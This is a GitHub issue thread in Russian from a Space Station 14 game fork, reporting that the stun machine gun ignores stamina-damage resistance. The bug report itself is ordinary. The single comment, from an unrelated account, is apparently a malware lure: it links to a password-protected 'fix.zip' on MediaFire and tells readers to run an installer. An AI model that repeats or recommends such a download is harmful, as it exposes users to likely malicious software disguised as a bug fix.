### ISSUE TITLE
"Ванильный" выстрел станнер пулемета

### ISSUE THREAD

**Issue by Bomjojuk** [SerbiaStrong-220/space-station-14#1667]
### Описание

На данный момент станнер пулемет игнорирует любой резист к стамина урону, что приводит к тому, что даже человек в скафандре командира яо падает в стамина крит за 7 выстрелов

"Мем" по багу: https://discord.com/channels/1097181193939730453/1098849312949162074/1278287623496138858

### Шаги воспроизведения

1. Выстрелить по кукле со станнер-пулемета
2. Проверяем параметр стамина урона у куклы/проверяем перенеся контроль на куклу, по которой выстрелили
3. Наблюдаем слишком большой урон при резисте 

### Скриншоты

https://cdn.discordapp.com/attachments/1098849312949162074/1278287623147749398/Untitled.mp4?ex=66d0419e&is=66cef01e&hm=6cbd64d679aa274931d514b45d286259bfbaf4f7a66f8d8fd24506a17b3165f8&

**Comment by chenkeyu123** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
